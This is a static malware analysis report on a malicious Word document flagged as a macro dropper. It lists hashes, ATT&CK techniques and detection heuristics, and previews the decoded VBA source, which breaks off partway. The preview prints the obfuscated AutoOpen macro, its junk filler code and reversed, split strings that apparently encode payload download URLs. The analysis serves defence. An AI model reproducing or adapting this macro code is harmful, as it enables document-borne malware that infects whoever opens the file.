Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2ff15b6627b14bd3…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 163.5 KB
Created: 2018-05-17 07:45:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18

MD5: 021fc965d607b23622da10d996c90adf
SHA-1: 04ea87b8ebdb4f09e114bb0985e4b91f30eae422
SHA-256: 2ff15b6627b14bd38a942955121c07ecaefcad830bc952dad87e01a3aa2cf2da

Risk Score: 202

Malware Insights

MITRE ATT&CK

  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

This Office document contains a critical 'Shell()' call within its VBA macros, indicating an attempt to execute arbitrary code. The presence of an AutoOpen macro further suggests automatic execution upon opening. The ClamAV detection 'Doc.Dropper.Agent-6546844-0' strongly points to this file being a dropper for additional malware, likely downloaded and executed via the VBA script.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6546844-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6546844-0
  • VBA macros detected [medium, 2 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 150920 bytes
SHA-256: 2a9ec1506926e17508cb6f3d3b003fede65292c32075386e9bf479820d8d0ff3

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "zTZADLcFXJtFRE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub GuJqoJ(uIvtS)
fWYTPG = NfmOGU
lKuOr = (zhISt / MKOVL / 95319 / Fix(lQzuPm)) + 9692 - CLng(kbHukT + CLng(4429)) + jNjBO + 98203 * NFaHud - CStr(97948) / aQNjq / CLng(QicmVO)
End Sub
Sub BYJoK(iIfwim)
lopfK = mRhiW
LjTjDO = (krMhQS / nTBuUj / 93344 / Fix(zbozb)) + 30534 - CLng(oTumDw + CLng(10735)) + YbhlC + 51901 * GZMaR - CStr(34687) / mJmoo / CLng(ruGmcH)
sndOl = IcSnzu
aUPkBz = (YhkAP / VUiVu / 17946 / Fix(YjTvzp)) + 68463 - CLng(nTVot + CLng(83577)) + WfWli + 94338 * LCdzbM - CStr(77145) / ztozYt / CLng(TmLOA)
NOLVSL = wzIizt
QSwOW = (pWcAt / QULja / 31136 / Fix(uzoSdI)) + 1963 - CLng(zwkJCf + CLng(47063)) + Bnzrfu + 83935 * Kczvdm - CStr(30277) / OBwXcA / CLng(FVfqX)
End Sub
Sub qrnrjK(cYQzFC)
BIFNM = CvBjAJ
SsVAE = (tUkME / cTFpkw / 33776 / Fix(sUwQSd)) + 79918 - CLng(vpGqaI + CLng(57392)) + CQvmIm + 31019 * BTjOwF - CStr(31977) / jjIzvF / CLng(aiDYuF)
STqVn = DfRGE
Pwtbt = (ZZHrAj / ziUIEO / 40786 / Fix(nAQYaS)) + 93344 - CLng(ERCsuq + CLng(69061)) + DJiVjG + 52892 * Jjpli - CStr(44295) / rjKbz / CLng(CTYcvD)
End Sub
Sub Autoopen()
On Error Resume Next
wnuHwn = ujzKh
wOucK = (hDKJkO / EAqJsl / 5329 / Fix(UWmhn)) + 92083 - CLng(TLjzt + CLng(46233)) + nYvRAW + 43627 * dJsLiE - CStr(6989) / GZfYb / CLng(IuXzPk)
musHwkwosI (ZkVOXN + dowlFKYHb + Oalji)
scpbMN = pcaOz
uQAuA = (moDYX / LrlIjo / 97175 / Fix(uAjFwm)) + 3288 - CLng(KzJHO + CLng(37268)) + BNjkZ + 85160 * oDSdBW - CStr(57435) / wmPGJt / CLng(vzOFRi)
End Sub
Sub PPirZ(vzDYBB)
cnSkf = dAWrIJ
RRiVU = (OhoCuJ / tlzjqE / 15825 / Fix(HIidZa)) + 1303 - CLng(sYaiA + CLng(36452)) + QiEamf + 76967 * XbizsD - CStr(76827) / DBrJJ / CLng(suAOb)
dUbwaH = AmiVCT
HCqcI = (EXXjJ / UMqJZ / 47277 / Fix(rHDzm)) + 43266 - CLng(XnOYfp + CLng(79591)) + wpDXFY + 85293 * wumRn - CStr(37047) / cEwwc / CLng(DDEGY)
RIwBUU = QAGBSf
BGFzFz = (cmTiq / WtmzR / 64639 / Fix(bzwtSw)) + 9583 - CLng(KWCdS + CLng(55894)) + wwEBa + 52647 * WiSdHL - CStr(43980) / GklmX / CLng(ILhIs)
End Sub
Sub SQQFY(HwnuQG)
mbTbo = tjvPSs
FLomXs = (aWGNNF / DaaMU / 58582 / Fix(lcoks)) + 36527 - CLng(UWAwMr + CLng(59451)) + IBWXYr + 30228 * FOjSp - CStr(11483) / DzOMT / CLng(ACfZjF)
End Sub

Attribute VB_Name = "FPAOsHRZpzGcVH"
Sub VIAJOC(BwfLOI)
qwplPP = NVahnv
AIjza = (hWYZq / HNCjjs / 18890 / Fix(zwQqFr)) + 83688 - CLng(nabaH + CLng(70764)) + qvNnq + 33935 * ZPvSI - CStr(55930) / mtpiU / CLng(Brsri)
End Sub
Function dowlFKYHb()
On Error Resume Next
ZiwzPq = NMnTF
JfZBv = (jOwBhm / mWzwDV / 9332 / Fix(skaSf)) + 53531 - CLng(PwwZkK + CLng(21676)) + bqwEzL + 54722 * RKTDzO - CStr(26130) / zACQuz / CLng(QLzwzD)
csvhf = QZIMrH
REbSi = (tsimY / KURAv / 58378 / Fix(irUEH)) + 78375 - CLng(LbpUXX + CLng(3634)) + zllLr + 7465 * duGXL - CStr(39646) / wZNiU / CLng(azAUd)
tMMvPYQ = wQpJm("t.mU9+mU9u.oc.yelmU9+mU9admU9+mU9htimU9+mU9emU9+mU9kmU9+mU9//mU9+mU9:mU9+mU9ptmU9+mUW3mZ", 19335 + 5 - 19335, 19335 + 82 - 19335)
wSCNOA = BUjPj
SfOZzj = (SwdQGp / ciCkQ / 66436 / Fix(Hkajs)) + 43061 - CLng(TuRKiv + CLng(4753)) + MXCkzX + 231 * mHZwrS - CStr(34467) / wAmLvn / CLng(FNmzBL)
HsMznz = LKiaZZ
lhupXA = (bLzFvh / YwOzvi / 67115 / Fix(lmVnV)) + 79349 - CLng(ZufjfW + CLng(25988)) + lSDEfj + 29026 * sPkmLT - CStr(55580) / rDjvIT / CLng(iwAlCa)
LshKN = wQpJm(".EMZQ9tm'+'U9+mU9cmU9+mU9udm'+'U9+mU9omU9+mU9rp/emU9+mU9gamU9+mU9mmU9+mU9i/'+'wt.moc.smU9+mU9o'+'mU9+mU9tmU9+mU9ada", 11928 + 2 - 11928, 11928 + 109 - 11928)
BTLEd = riDVWs
XlCQGR = (scnSl / iZHfv / 24714 / Fix(jNQbG)) + 80302 - CLng(mMANYP + CLng(82968)) + tujfk + 46983 * ZjsTM - CStr(93894) / WXZJY / CLng(JUbKQT)
jBihNL = oaCbzN
wVTSGI = (PFHVrL / HJhvsO / 18327 / Fix(GwRUlT)) + 38864 - CLng(bOZZs + CLng(14552)) + XkRCR + 92432 * LWzDh - CStr(32905) / fEwpA / CLng(VAmWL)
cwAkETD = wQpJm("w0mU9;)CDSAxmU9+m'+'U91 ,mU9+mU9)(pmU9+mU9e9mU9+
... (truncated)